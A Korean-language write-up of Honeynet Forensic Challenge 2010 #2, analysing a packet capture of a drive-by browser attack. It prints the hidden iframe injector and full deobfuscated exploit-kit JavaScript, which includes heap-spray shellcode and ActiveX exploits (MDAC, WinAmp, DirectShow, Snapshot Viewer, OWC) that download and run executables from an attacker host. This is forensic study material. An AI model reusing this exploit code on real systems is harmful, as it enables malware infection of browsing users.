Challenge 2 of the Forensic Challenge 2010 – browsers under attack

두번째 문제이다. 이번 문제는 평소에 자주 분석하던 유형의 문제라 재밌게 푼거 같다.
URL : http://www.honeynet.org/challenges/2010_2_browsers_under_attack

1. List the protocols found in the capture. What protocol do you think the attack is/are based on? (2pts)

전체 패킷이 745개 이며 이중 553개가 TCP 프로토콜이며 이중 126개가 HTTP 프로토콜이다.
따라서 HTTP를 통해 공격이 이루어 졌을것으로 보인다.
확인은 Wireshark에서 "Protocol Hierarchy" 메뉴를 통해 확인할 수 있다.

2. List IPs, hosts names / domain names. What can you tell about it - extrapolate? What to deduce from the setup? Does it look like real situations? (4pts)

음?

3. List all the web pages. List those visited containing suspect and possibly malicious javascript and who's is connecting to it? Briefly describe the nature of the malicious web pages (6pts)

해당 덤프에서 접속한 기록이 있는 URL 리스트는 아래와 같다.

rapidshare.com.eyu32.ru
sploitme.com.cn
www.honeynet.org
www.google-analytics.com
www.google.com
www.google.fr
clients1.google.fr
shop.honeynet.sg

이 중 rapidshare.com.eyu32.ru/login.php 페이지 소스 중 아래와 같은 코드가 포함되어 있다.

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('q.r(s("%h%0%6%d%e%7%1%8%9%d%3%4%a%5%2%2%i%j%b%b%9%i%c%k%0%2%7%1%l%3%k%7%l%3%m%b%t%3%c%0%3%u%4%v%6%1%f%w%e%x%f%y%6%a%z%0%g%2%5%4%n%8%5%1%0%A%5%2%4%n%8%9%2%o%c%1%4%a%B%0%9%0%f%0%c%0%2%o%j%8%5%0%g%g%1%m%a%p%h%b%0%6%d%e%7%1%p%C"));',39,39,'69|65|74|63|3D|68|66|6D|20|73|22|2F|6C|72|61|62|64|3C|70|3A|6F|2E|6E|31|79|3E|document|write|unescape|3F|6B|33|35|36|32|77|67|76|0A'.split('|'),0,{}));

이 코드를 풀면 아래와 같이 나오게 된다.

<iframe src="http://sploitme.com.cn/?click=3feb5a6b2f"width=1 height=1 style="visibility: hidden"></iframe> 

해당 페이지로 인해 http://sploitme.com.cn/?click=3feb5a6b2f 페이지로 접속하게 된다.
접속을 하면 없는 302 에러가 나며 해당 요청은 아래와 같다.

GET /?click=3feb5a6b2f HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://rapidshare.com.eyu32.ru/login.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: sploitme.com.cn
Connection: Keep-Alive

HTTP/1.1 302 Found
Date: Tue, 02 Feb 2010 19:05:43 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4.6
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: http://sploitme.com.cn/fg/show.php?s=3feb5a6b2f
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

Location으로 인해 http://sploitme.com.cn/fg/show.php?s=3feb5a6b2f URL로 이동하게 되며 해당 페이지 소스는 아래와 같다.

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<meta name="robots" content="noindex">
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /fg/show.php?s=3feb5a6b2f was not found on this server.</p>

<script language='JavaScript'>
<!--
var CRYPT={signature:'CGerjg56R',_keyStr:'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',decode:function(input){var output='';var chr1,chr2,chr3;var enc1,enc2,enc3,enc4;var i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i<input.length){enc1=this._keyStr.indexOf(input.charAt(i++));enc2=this._keyStr.indexOf(input.charAt(i++));enc3=this._keyStr.indexOf(input.charAt(i++));enc4=this._keyStr.indexOf(input.charAt(i++));chr1=(enc1<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;output=output+String.fromCharCode(chr1);if(enc3!=64){output=output+String.fromCharCode(chr2);}
if(enc4!=64){output=output+String.fromCharCode(chr3);}}
output=CRYPT._utf8_decode(output);return output;},_utf8_decode:function(utftext){var string='';var i=0;var c=0,c1=0,c2=0,c3=0;while(i<utftext.length){c=utftext.charCodeAt(i);if(c<128){string+=String.fromCharCode(c);i++;}else if((c>191)&&(c<224)){c2=utftext.charCodeAt(i+1);string+=String.fromCharCode(((c&31)<<6)|(c2&63));i+=2;}else{c2=utftext.charCodeAt(i+1);c3=utftext.charCodeAt(i+2);string+=String.fromCharCode(((c&15)<<12)|((c2&63)<<6)|(c3&63));i+=3;}}
return string;},obfuscate:function(str){var container='';for(var i=0,z=0;i<str.length;i=i+3,z++){container+=String.fromCharCode(str.substring(i,i+3)-this.signature.substring(z%this.signature.length,z%this.signature.length+1).charCodeAt(0));}
return CRYPT.decode(container);}}
eval(CRYPT.obfuscate('157181187231195154135166180117123204195156160169153153187179201185191214128142198189161189196191200140103190165122187162181170153169180117149205214177211171152187120182200223192212126122130170144210184211201104140130146180175229195190106168156188190222191174168172129166183128168223196152151163160115168188171223176122132193157158179228189189118165157155187151203194176156153191153191181201159152151125201122171173188159204104128190166155150231196191152157163154149149211194193161141151124176198223192209153121185172155189192158201140173203143179205192190172157139168137136206189190219110143132137119190164209214143137190122171173188159204104128190166155150231196191152157163154149149211194193161141151124176198223192209153121185172155188222212202162111204165121191162182211157132166136175186200176168158129166183128190164176151142104185178161184222161203125128135168122175222205187102171172155170204201175152130137154149119200184180211152142168175170152195217178137170139156121171162195153156165172150179156216194152110121191175180176186180211152138130124169211200221201120162203157159183163205212105159159134144156213215189173130191124190191201158214126161182137157168187221176158111191157192158236203174110105158177137212213174160163144170149173190201218207154122130187145211187163176158170160156159183225182213127158180176153219212189206165130153157175199186184211128138198188161189183223202103140199157138205231206190173169157151187213204211207174144170136188200223192225152125139184170151200191193141158130147155149219183186126166183118145209214178189174152187133119200224192211132105131175169173192214204104128190167143187235204208119163171154191223204190219110156163179121190202179206153142156182171172171215200140174190147154201225206175135173161172127219213157169168152132175119199201191220142104139183147210192223179103144192143121221232195190134171181138175220194156188110131165166126201223176224126125172179169172200223192140103190147154201163205174135158182138156218204194207161128204183180201201159209153125190185169206180174202162140186167142187194181174109169180172179156214215173174127154140128199224192218151122198115170211222161202159103200143178179235196190123102172152128206211215189159154149171188176202155209142142164173168168218214178141170139134180209223181170123175157155187149213216211108153188116189177221184224143141152115161186171211200162140188167138205231182170152164157155120207203194185159151149171179176202222160155135194179161206217210202158162137167143175167207154126111180188124169213215189157154153153151190223218211142105163178169206233216177174173192141192209171195153123102171117174212204189211108156170115146198201195214126142155179172152196227204141170203147158157231188153139102166117145214204193181101129149166181177185158215155141160171171172192217178124139194168122150171173212161163157134141222189194219101153192175126200220155221129161182175171170171211200162140188167138205231182170152164157155120207203194185159151149171179176202222160155135194179161206217210202158162137167143175167207154126111180188124173204194185133143191179179190165187214151159190124160151184154192103157193157154209169208191101129181176157149214194177170127154140126203195218212153141135173171172222224201158120154165192205218181191169104171155144204213228152121153191153175201185192183128125151182145150214190192104128194166143182231191153157162180138190211189190219103143170140174199236155171152163168171171172200186178124123197141119171183190151135121158175149149213215189157152165166183180165196207152159148175151189191223185140107132164159175232204212102162180177152212188155169174152132145179200165183213128138198117160189187209204124158203147158154163204174172109182176141222187177177165152188116179177221214151143141130178145150196176187139119192142154216224194173172164157117161213212177189170143169116179180165188224154142198119168173187163201162140133140141205192190172157102182139137184204194173102144170145119176181213158155135194173160189196212200120158190142159217162205213161109183138175222194193156161154203133137190165188215153163168156155151188219193140132130142138201192203190131175180118149219204216184170141151116148184184188188138121181179150152162181192103124130156121204225196186161109183138175222194193156161154203133137190165188215153163168156155151188219193140132130142138201192191152157132166135144218199156189174154191153192188183155180136124164152156168213218182104103139134180209223181170123106179139144213213215189101154170141188176182171215132105186178170206167224202124140199142138201186188189134164158139157222212178185171144191175186191197226212142141202189161184221181204124158203143181179222204212134165180177157216212173210108154191137192174185196215151125168173169151167154193140107130147159205225205208106175172155149220212156156175144167141189191186213158151175135152172189180214183137123137165192154192204153135162162151148156212227156133153153153188176181213158151175135155170210222154193136158191164158221222195153110171182138157218214173210108152203120155190202196211139125139138168188234214178124128194165176220235181187169176158175145150212211207158151169119186178181213158155135194176171188167212203124162200165176167230196174123160157134179156214215173174127153174128178182222153142142155170169151188219193140132130166193150231196191152157163155145222203194210164128133183138183182213153134176167116149206162156181138123204143155170234188171118170161151174223195189151172131151144190179183196171130160190137148223204163177174173192168119175183185187143122160151156151190190192102135166144187178198176172130121130120150169192172179137119201148193166162188210130175161152156223192216151163130149167126182199179156134161160137153170195222185138131133149154149162184151138174158151178223191212176169136150149137178220175222131160151118148185183156205136153197141122216233183171118104164173136223191227151172131150132190177198171222130122147183152223179225180120102201144139166233183171118173159135136220192174193110128203186181202236171222130122172138148169192172179137119201144139166230183171118173159134120169191174168172130166132190178182171222130122147186148169179154181163102192143138201169184212138176159173136152191177172169132204156121191181154151143141167117147185217157182140131198157142178234196212122107159154152222204215180175156165166186175165221153131122151115149185183227184158103149146155200166182187134103159152152217195190169122133149116142182162196172135160159189153185217228180101132139141192220224207225153125160152144152196212192175130167156190179221195219131122159189148184162158184137127132143155178236185188138173159115148220195191188175136154115181177181206158130122171118148207192176180121161198149177183182183208101102159117148153190190206175132166170187178182214174134102163187153170187225181175143132169154200229180154168104159189179172192228176102136187115191182220180172129138163119148223183222184137162153149138149166184225134106160135170151193174176172131166133128175235225213154102156133148169183158181137161135143155171183187209130170160135153210193189151105131130140119177198187153130138163116149170191158181122128153146143149224182170153109164135137169191174203122132166156187179162183153132137130115148149203226179138127130148155166230183209139125160152140221191191193119135188136124203197205218127105198137150170192174184101136151149176150182187187126106158151152154192215176169135188132120178181154153134176147118152223221156180159135133145178175171180224173171182154191216189190219104151153175186191197210221142163194175160152196228190103162182142159217164195191126157171151120218214193223168133132175180176185163208150163168173171173192204200139102199166122187219205154135175179154124211189174168168131165174128181197206158127175190122160185163213201103132131165158187231206170106160181176157205214177189123152153153187191201159151128121182185160210226214192104135192142155217218182213131162182136141149214178177165143192153119191197209213142104202171170152192218193120153197141121179229205153161161161172170215212156177166144169145119200163222215141137135189171188188228203125128194165180200225183186173172171176183209203157185175141132175171177223226211151163182115168168162226178136161137169158187229205153139109182139145154215156172110152191153122174183176209153125190117161187218186192162166190156122182225204153127167172154149149213155219165142165174126203201184207153125160178146172199218204104103139134180209223181174122166183118153222215194219103143170140174190220155171152163168171171172200186178124123197141120201198195154127166181139152218199156207161152153186181176198222215143159186172146189230218193158158154165192205218181186161109179154160212195156207161143132183145186181209215128142198135169151163225201124140130157154204226185154102162180139149209215154181171152170133186191202188211128121189122173182226227193141136131166180153217206175127103172151187158216194152159143170149177198181210211128142198124173182226218178174169137169152213182204153102173180138157149204189206165133133115146199201188207142175185179150220175167'));
//-->
</script>
<noscript></noscript>
</body></html>

이 코드를 풀면 래와 같은 코드가 나온다.

function Complete(){setTimeout('location.href = "about:blank',2000);}
function CheckIP(){var req=null;try{req=new ActiveXObject("Msxml2.XMLHTTP");}catch(e){try{req=new ActiveXObject("Microsoft.XMLHTTP");}catch(e){try{req=new XMLHttpRequest();}catch(e){}}}
if(req==null)return"0";req.open("GET","/fg/show.php?get_ajax=1&r="+Math.random(),false);req.send(null);if(req.responseText=="1"){return true;}else{return false;}}
var urltofile='http://sploitme.com.cn/fg/load.php?e=1';var filename='update.exe';function CreateO(o,n){var r=null;try{r=o.CreateObject(n)}catch(e){}
if(!r){try{r=o.CreateObject(n,'')}catch(e){}}
if(!r){try{r=o.CreateObject(n,'','')}catch(e){}}
if(!r){try{r=o.GetObject('',n)}catch(e){}}
if(!r){try{r=o.GetObject(n,'')}catch(e){}}
if(!r){try{r=o.GetObject(n)}catch(e){}}
return r;}
function Go(a){var s=CreateO(a,'WScript.Shell');var o=CreateO(a,'ADODB.Stream');var e=s.Environment('Process');var xhr=null;var bin=e.Item('TEMP')+'\\'+filename;try{xhr=new XMLHttpRequest();}
catch(e){try{xhr=new ActiveXObject('Microsoft.XMLHTTP');}
catch(e){xhr=new ActiveXObject('MSXML2.ServerXMLHTTP');}}
if(!xhr)return(0);xhr.open('GET',urltofile,false)
xhr.send(null);var filecontent=xhr.responseBody;o.Type=1;o.Mode=3;o.Open();o.Write(filecontent);o.SaveToFile(bin,2);s.Run(bin,0);}
function mdac(){var i=0;var objects=new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','{BD96C556-65A3-11D0-983A-00C04FC29E36}','{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','{0006F033-0000-0000-C000-000000000046}','{0006F03A-0000-0000-C000-000000000046}','{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','{6414512B-B978-451D-A0D8-FCFDF33E833C}','{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}','{06723E09-F4C2-43c8-8358-09FCD1DB0766}','{639F725F-1B2D-4831-A9FD-874847682010}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);while(objects[i]){var a=null;if(objects[i].substring(0,1)=='{'){a=document.createElement('object');a.setAttribute('classid','clsid:'+objects[i].substring(1,objects[i].length-1));}else{try{a=new ActiveXObject(objects[i]);}catch(e){}}
if(a){try{var b=CreateO(a,'WScript.Shell');if(b){if(Go(a)){if(CheckIP()){Complete();}else{Complete();}
return true;}}}catch(e){}}
i++;}
Complete();}
mdac();

위 코드는 MS06-014 취약점을 이용하여 http://sploitme.com.cn/fg/load.php?e=1 파일을 다운로드 하여 update.exe 파일로 저장 후 실행하는 코드로 보인다.

추가로 아래쪽 패킷을 보면 http://sploitme.com.cn/fg/show.php?s=84c090bd86 로 접근한 이력도 있다.
해당 페이지 코드는 위 코드에서 좀 더 많은 취약점이 추가되어 있다. 우선 난독화를 해제하면 아래와 같다.

function Complete(){setTimeout('location.href = "about:blank',2000);}
function CheckIP(){var req=null;try{req=new ActiveXObject("Msxml2.XMLHTTP");}catch(e){try{req=new ActiveXObject("Microsoft.XMLHTTP");}catch(e){try{req=new XMLHttpRequest();}catch(e){}}}
if(req==null)return"0";req.open("GET","/fg/show.php?get_ajax=1&r="+Math.random(),false);req.send(null);if(req.responseText=="1"){return true;}else{return false;}}
var urltofile='http://sploitme.com.cn/fg/load.php?e=1';var filename='update.exe';function CreateO(o,n){var r=null;try{r=o.CreateObject(n)}catch(e){}
if(!r){try{r=o.CreateObject(n,'')}catch(e){}}
if(!r){try{r=o.CreateObject(n,'','')}catch(e){}}
if(!r){try{r=o.GetObject('',n)}catch(e){}}
if(!r){try{r=o.GetObject(n,'')}catch(e){}}
if(!r){try{r=o.GetObject(n)}catch(e){}}
return r;}
function Go(a){var s=CreateO(a,'WScript.Shell');var o=CreateO(a,'ADODB.Stream');var e=s.Environment('Process');var xhr=null;var bin=e.Item('TEMP')+'\\'+filename;try{xhr=new XMLHttpRequest();}
catch(e){try{xhr=new ActiveXObject('Microsoft.XMLHTTP');}
catch(e){xhr=new ActiveXObject('MSXML2.ServerXMLHTTP');}}
if(!xhr)return(0);xhr.open('GET',urltofile,false)
xhr.send(null);var filecontent=xhr.responseBody;o.Type=1;o.Mode=3;o.Open();o.Write(filecontent);o.SaveToFile(bin,2);s.Run(bin,0);}
function mdac(){var i=0;var objects=new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','{BD96C556-65A3-11D0-983A-00C04FC29E36}','{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','{0006F033-0000-0000-C000-000000000046}','{0006F03A-0000-0000-C000-000000000046}','{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','{6414512B-B978-451D-A0D8-FCFDF33E833C}','{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}','{06723E09-F4C2-43c8-8358-09FCD1DB0766}','{639F725F-1B2D-4831-A9FD-874847682010}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);while(objects[i]){var a=null;if(objects[i].substring(0,1)=='{'){a=document.createElement('object');a.setAttribute('classid','clsid:'+objects[i].substring(1,objects[i].length-1));}else{try{a=new ActiveXObject(objects[i]);}catch(e){}}
if(a){try{var b=CreateO(a,'WScript.Shell');if(b){if(Go(a)){if(CheckIP()){Complete();}else{aolwinamp();}
return true;}}}catch(e){}}
i++;}
aolwinamp();}
function aolwinamp(){try{var obj=document.createElement('object');document.body.appendChild(obj);obj.id='IWinAmpActiveX';obj.width='1';obj.height='1';obj.data='./directshow.php';obj.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6C70%u696F%u6D74%u2E65%u6F63%u2E6D%u6E63%u662F%u2F67%u6F6C%u6461%u702E%u7068%u653F%u333D");var bigblock=unescape("%u0c0c%u0c0c");var headersize=20;var slackspace=headersize+shellcode.length;while(bigblock.length<slackspace)bigblock+=bigblock;var fillblock=bigblock.substring(0,slackspace);var block=bigblock.substring(0,bigblock.length-slackspace);while(block.length+slackspace<0x40000)block=block+block+fillblock;var memory=new Array();for(var i=0;i<666;i++){memory[i]=block+shellcode;}
document.write('<SCRIPT language="VBScript">');document.write('bof=string(1400,unescape("%ff")) + string(1000,unescape("%0c"))');document.write('IWinAmpActiveX.ConvertFile bof,1,1,1,1,1');document.write('IWinAmpActiveX.ConvertFile bof,1,1,1,1,1');document.write('IWinAmpActiveX.ConvertFile bof,1,1,1,1,1');document.write('IWinAmpActiveX.ConvertFile bof,1,1,1,1,1');document.write('</SCRIPT>');}catch(e){}
directshow();}
function directshow(){var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6C70%u696F%u6D74%u2E65%u6F63%u2E6D%u6E63%u662F%u2F67%u6F6C%u6461%u702E%u7068%u653F%u343D");var bigblock=unescape("%u9090%u9090");var headersize=20;var slackspace=headersize+shellcode.length;while(bigblock.length<slackspace)bigblock+=bigblock;var fillblock=bigblock.substring(0,slackspace);var block=bigblock.substring(0,bigblock.length-slackspace);while(block.length+slackspace<0x40000){block=block+block+fillblock;}
var memory=new Array();for(var i=0;i<350;i++){memory[i]=block+shellcode;}
try{var obj=document.createElement('object');document.body.appendChild(obj);obj.width='1';obj.height='1';obj.data='./directshow.php';obj.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';setTimeout("if (CheckIP()){ Complete(); } else { snapshot(); }",1000);}catch(e){snapshot();}}
function snapshot(){var x;var obj;var mycars=new Array();mycars[0]='c:/Program Files/Outlook Express/wab.exe';mycars[1]='d:/Program Files/Outlook Express/wab.exe';mycars[2]='e:/Program Files/Outlook Express/wab.exe';try{var obj=new ActiveXObject('snpvw.Snapshot Viewer Control.1');}catch(e){try{var obj=document.createElement('object');obj.setAttribute('classid','clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9');obj.setAttribute('id','obj');obj.setAttribute('width','1');obj.setAttribute('height','1');document.body.appendChild(obj);}catch(e){}}
try{if(obj='[object]'){for(x in mycars){obj=new ActiveXObject('snpvw.Snapshot Viewer Control.1');var buf=mycars[x];obj.Zoom=0;obj.ShowNavigationButtons=false;obj.AllowContextMenu=false;obj.SnapshotPath='http://sploitme.com.cn/fg/load.php?e=6';try{obj.CompressedPath=buf;obj.PrintSnapshot();var snpelement=document.createElement('iframe');snpelement.setAttribute('id','snapiframe');snpelement.setAttribute('src','about:blank');snpelement.setAttribute('width',1);snpelement.setAttribute('height',1);snpelement.setAttribute('style','display:none;');document.body.appendChild(snpelement);setTimeout("document.getElementById('snapiframe').src = 'ldap://';",3000);}catch(e){}}}}catch(e){}
com();}
function com(){try{var obj=document.createElement('object');document.body.appendChild(obj);obj.setAttribute('classid','clsid:EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F');if(obj){var shcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6C70%u696F%u6D74%u2E65%u6F63%u2E6D%u6E63%u662F%u2F67%u6F6C%u6461%u702E%u7068%u653F%u373D");var hbs=0x100000;var sss=hbs-(shcode.length*2+0x38);var hb=(0x0c0c0c0c-hbs)/hbs;var myvar=unescape("%u0C0C%u0C0C");var ss=myvar;while(ss.length*2<sss){ss+=ss;}
ss=ss.substring(0,sss/2);var m=new Array();for(var i=0;i<hb;i++){m[i]=ss+shcode;}
var z=Math.ceil(0x0c0c0c0c);z=document.scripts[0].createControlRange().length;}}catch(e){}
spreadsheet();}
function spreadsheet(){try{var objspread=new ActiveXObject('OWC10.Spreadsheet');}catch(e){}
if(objspread){try{var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6C70%u696F%u6D74%u2E65%u6F63%u2E6D%u6E63%u662F%u2F67%u6F6C%u6461%u702E%u7068%u653F%u383D");var array=new Array();var ls=0x81000-(shellcode.length*2);var bigblock=unescape("%u0b0c%u0b0C");while(bigblock.length<ls/2){bigblock+=bigblock;}
var lh=bigblock.substring(0,ls/2);delete bigblock;for(var i=0;i<0x99*2;i++){array[i]=lh+lh+shellcode;}
CollectGarbage();var objspread=new ActiveXObject("OWC10.Spreadsheet");e=new Array();e.push(1);e.push(2);e.push(0);e.push(window);for(i=0;i<e.length;i++){for(j=0;j<10;j++){try{objspread.Evaluate(e[i]);}catch(e){}}}
window.status=e[3]+"";for(j=0;j<10;j++){try{objspread.msDataSourceObject(e[3]);}catch(e){}}}catch(e){}}
Complete();}
mdac();

여기서 각각 함수에 따른 취약점을 설명하면 아래와 같다.

mdac()
MS06-014
CLSID : BD96C556-65A3-11D0-983A-00C04FC29E36 외 다수
최종 다운로드 파일 : http://sploitme.com.cn/fg/load.php?e=1

aolwinamp()
AOL IWinAmpActiveX Class (AmpX.dll 2.4.0.6) ConvertFile() remote overflow exploit (IE6/IE7)
CVE-2007-6250
관련 사이트 : http://www.kb.cert.org/vuls/id/568681
최종 다운로드 파일 : http://sploitme.com.cn/fg/load.php?e=3

directshow()
MS09-032
CLSID : 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF
최종 다운로드 파일 : http://sploitme.com.cn/fg/load.php?e=4

snapshot()
CVE-2008-2463
CLSID : F0E42D50-368C-11D0-AD81-00A0C90DC8D9
최종 다운로드 파일 : http://sploitme.com.cn/fg/load.php?e=6

com()
MS05-052
CLSID : EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F
최종 다운로드 파일 : http://sploitme.com.cn/fg/load.php?e=7

spreadsheet()
CVE-2009-1136
최종 다운로드 파일 : http://sploitme.com.cn/fg/load.php?e=8

4. Can you sketch an overview of the general actions performed by the attacker? (2pts)

공격자는 rapidshare.com.eyu32.ru/login.php 페이지에 SQL Injection 등의 공격을 통해 악성 스크립트를 삽입하였다.
그로 인해 해당 페이지 방문자는 http://sploitme.com.cn/?click=3feb5a6b2f 페이지로 접속하게 되며, MS06-014 취약점 외 다수 취약점을 통해 악성코드에 감염되게 된다.

5. What steps are taken to slow the analysis down? (2pts)

패킷을 보면 http://sploitme.com.cn/?click=3feb5a6b2f 페이지 접속 시 아래와 같은 코드를 보여줘서 없는 페이지로 착각하게 만든다.

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<meta name="robots" content="noindex">
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /fg/show.php?s=3feb5a6b2f was not found on this server.</p>

6. Provide the javascripts from the pages identified in the previous question. Decode/deobfuscate them too. (8pts)

자바스크립트를 디코딩 하라는 문제로 보이며 위 3번에서 모두 설명 했음.

7. On the malicious URLs at what do you think the variable 's' refers to? List the differences. (2pts)

s 변수에 적힌값에 따라 접속하는 페이지는 아래 두 페이지로 확인되었으며 두 페이지의 내용은 약간의 차이가 있다.
설명은 3번에서 모두 했음.
http://sploitme.com.cn/fg/show.php?s=3feb5a6b2f
http://sploitme.com.cn/fg/show.php?s=84c090bd86

8. Which operating system was targeted by the attacks? Which software? And which vulnerabilities? Could the attacks been prevented? (4pts)

모두 Windows 시스템의 Internet Explorer를 타켓으로 한 취약점이다.

mdac()
MS06-014
CLSID : BD96C556-65A3-11D0-983A-00C04FC29E36 외 다수
최종 다운로드 파일 : http://sploitme.com.cn/fg/load.php?e=1

aolwinamp()
AOL IWinAmpActiveX Class (AmpX.dll 2.4.0.6) ConvertFile() remote overflow exploit (IE6/IE7)
CVE-2007-6250
관련 사이트 : http://www.kb.cert.org/vuls/id/568681
최종 다운로드 파일 : http://sploitme.com.cn/fg/load.php?e=3

directshow()
MS09-032
CLSID : 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF
최종 다운로드 파일 : http://sploitme.com.cn/fg/load.php?e=4

snapshot()
CVE-2008-2463
CLSID : F0E42D50-368C-11D0-AD81-00A0C90DC8D9
